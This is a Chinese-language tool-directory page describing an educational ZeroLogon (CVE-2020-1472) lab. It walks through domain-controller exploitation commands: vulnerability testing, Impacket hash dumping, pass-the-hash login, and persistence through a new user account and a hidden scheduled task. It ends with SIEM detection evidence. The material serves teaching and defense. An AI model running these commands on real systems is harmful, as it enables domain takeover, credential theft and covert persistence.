Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ZeroLogon-CVE-2020-1472-lab — ZeroLogon (CVE-2020-1472) 漏洞的解释与演示 | Kitploit
工具/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
权限提升密码攻击持久化机制漏洞分析漏洞利用后渗透利用CTF渗透测试学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
实验室与实践
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

ZeroLogon (CVE-2020-1472) 漏洞的解释与演示

查看仓库
311个月前尚未审核

ZeroLogon-CVE-2020-1472

ZeroLogon (CVE-2020-1472) 漏洞的说明与演示

本实验的目的严格限于教育用途。 不建议在生产环境或非您拥有的环境中执行。

关于漏洞

漏洞背景

此漏洞允许网络犯罪分子接管域控制器(DC)。攻击方式是通过更改或移除控制器上服务账户的密码。恶意攻击者可能仅仅造成服务拒绝,或者完全控制并拥有整个网络。 微软已于2020年8月发布补丁。

  • 严重性:10.0(严重)(CVSS v3.1)

受影响组件:微软 Netlogon 远程协议 (MS-NRPC)

受影响 Windows 版本:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • 2020年8月/9月补丁之前的版本

需求

克隆仓库

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - 测试目标服务器是否易受攻击

如果要在本地执行!

  • 下载 Kali Linux
  • 下载易受攻击的 Windows Server 2008 R2
  • Virtualbox

在 AWS 上也可以使用这些镜像(注意计费)

  • 易受攻击的 Windows - 社区 AMI 921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - Marketpace AMI

额外:一个 Wazuh 账户用于 SIEM 事件分析。

  • Wazuh Cloud(14天试用)

如何利用

提示:在 Kali Linux 中,SSH 服务默认是禁用的——需要手动启动。

在测试服务器是否易受攻击之前,我们可以使用 nmap 查看哪些端口是开放的:

root@kitploit:~
nmap -sS -T4 -F --open -n ip
屏幕截图 2025-10-10 09:34:13

使用 CVE-2020-1472 - 测试目标服务器是否易受攻击。执行命令:

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
屏幕截图 2025-10-04 20:14:40

secretdump 工具是 Impacket 的一个工具包。

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
屏幕截图 2025-10-04 20:23:53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
屏幕截图 2025-10-04 20:27:05

如果一切顺利,我们将能使用哈希进行登录什么是 pass-the-hash 攻击?

屏幕截图 2025-10-04 20:30:39

现在只需创建持久化!可以是一个新用户!

root@kitploit:~
net user coringa Batman2025 /add
屏幕截图 2025-10-04 20:36:09

完成!用户创建成功!

屏幕截图 2025-10-04 20:38:04

也可以创建一个任务!

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
屏幕截图 2025-10-10 10:17:17 屏幕截图 2025-10-10 10:20:33

SIEM 中的事件

可以看到用户创建以及与 pass-the-hash 和用户创建相关的事件!

2025-10-06_10-08-10 2025-10-06_10-09-06

参考

  • Zerologon (CVE-2020-1472): An Unauthenticated Privilege Escalation to Full Domain Privilege
  • 什么是 Zerologon?
  • [MS-NRPC]: Netlogon Remote Protocol
  • CVE-2020-1472 Detail
  • ZeroLogon-CVE-2020-1472 - YouTube 实验
  • Pass-the-Hash Attack
  • 更多关于 Impacket
下载工具